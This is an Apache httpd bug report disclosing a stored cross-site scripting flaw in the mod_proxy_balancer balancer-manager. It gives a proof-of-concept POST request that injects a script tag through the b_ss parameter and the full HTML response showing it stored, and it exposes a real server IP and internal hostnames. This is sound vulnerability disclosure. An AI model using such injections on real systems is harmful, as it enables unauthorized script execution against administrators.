Bug 59561 - Stored Cross Site Scripting
Summary: Stored Cross Site Scripting
Status: NEW
Alias: None
Product: Apache httpd-2
Classification: Unclassified
Component: mod_proxy_balancer (show other bugs)
Version: 2.4.20
Hardware: All All
: P2 critical (vote)
Target Milestone: ---
Assignee: Apache HTTPD Bugs Mailing List
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2016-05-17 10:50 UTC by Łukasz Demczuk
Modified: 2016-07-07 17:53 UTC (History)
0 users



Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Łukasz Demczuk 2016-05-17 10:50:42 UTC
Parameter: b_ss

It is possible to include javascript to site.

POST /balancer/ HTTP/1.1
Host: 193.25.161.222:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://193.25.161.222:8443/balancer/?b=sgb_cluster&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

b_ss=ROUTEIDzwmgn<script>alert(1)<%2fscript>f1how&b=sgb_cluster&b_max=1&b_sforce=0&b_tmo=0&b_lbm=heartbeat&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e

Response:

HTTP/1.1 200 OK
Date: Tue, 17 May 2016 09:41:10 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head><title>Balancer Manager</title>
<style type='text/css'>
table {
 border-width: 1px;
 border-spacing: 3px;
 border-style: solid;
 border-color: gray;
 border-collapse: collapse;
 background-color: white;
 text-align: center;
}
th {
 border-width: 1px;
 padding: 2px;
 border-style: dotted;
 border-color: gray;
 background-color: white;
 text-align: center;
}
td {
 border-width: 1px;
 padding: 2px;
 border-style: dotted;
 border-color: gray;
 background-color: white;
 text-align: center;
}
</style>
</head>
<body><h1>Load Balancer Manager for 193.25.161.222</h1>

<dl><dt>Server Version: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips mod_jk/1.2.40</dt>
<dt>Server Built: Dec  2 2014 08:09:42
</dt></dl>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=sgb_cluster&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">balancer://sgb_cluster</a> [p17f73b00_sgb_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEIDzwmgn<script>alert(1)</script>f1how<td>Off</td>
</td><td>0</td><td>1</td>
<td>heartbeat</td>
<td>/sgb/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=sgb_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>sgb1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>1</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a href="/balancer/?b=sgb_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>sgb2</td><td>555-555-0199@example.com</td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>1</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=rbp_cluster&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">balancer://rbp_cluster</a> [p17f73b00_rbp_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/rbp/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=rbp_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>rbp1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a href="/balancer/?b=rbp_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>rbp2</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=erb_cluster&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">balancer://erb_cluster</a> [p17f73b00_erb_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/erb/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=erb_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>erb1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>1</td><td>0</td><td>0</td><td>1.5K</td><td> 20 </td></tr>
<tr>
<td><a href="/balancer/?b=erb_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>erb2</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>1</td><td>0</td><td>0</td><td>1.5K</td><td> 20 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=get_cluster&nonce=fd098a63-6823-4136-92ea-a107dd82293a">balancer://get_cluster</a> [p17f73b00_get_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/get/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=get_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=fd098a63-6823-4136-92ea-a107dd82293a">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>get1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a href="/balancer/?b=get_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=fd098a63-6823-4136-92ea-a107dd82293a">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>get2</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>Edit balancer settings for balancer://sgb_cluster</h3>
<form method='POST' enctype='application/x-www-form-urlencoded' action='https://193.25.161.222:8443/balancer/'>
<dl>
<table>
<tr><td>LBmethod:</td><td>
<select name='b_lbm' id='b_lbm'><option value='bytraffic'>bytraffic
<option value='heartbeat' selected >heartbeat
<option value='bybusyness'>bybusyness
<option value='byrequests'>byrequests
</select>
</td></tr>
<tr><td>Timeout:</td><td><input name='b_tmo' id='b_tmo' type=text value='0'></td></tr>
<tr><td>Failover Attempts:</td><td><input name='b_max' id='b_max' type=text value='1'></td></tr>
<tr><td>Disable Failover:</td><td>On <input name='b_sforce' id='b_sforce' value='1' type=radio> <br/> Off <input name='b_sforce' id='b_sforce' value='0' type=radio checked></td>
<tr><td>Sticky Session:</td><td><input name='b_ss' id='b_ss' size=64 type=text value ='ROUTEIDzwmgn<script>alert(1)</script>f1how'>&nbsp;&nbsp;&nbsp;&nbsp;(Use '-' to delete)</td></tr>
<tr><td colspan=2><input type=submit value='Submit'></td></tr>
</table>
<input type=hidden name='b' id='b' value='sgb_cluster'>
<input type=hidden name='nonce' id='nonce' value='afb01cc6-57d6-402a-a118-ccc1ded6833e'>
</form>
<hr />
</body></html>
Comment 1 Jim Jagielski 2016-07-07 17:53:49 UTC
This should only be possible if the attacker has access to the balancer-manager application itself. If so, there is a lot more the attacker can do.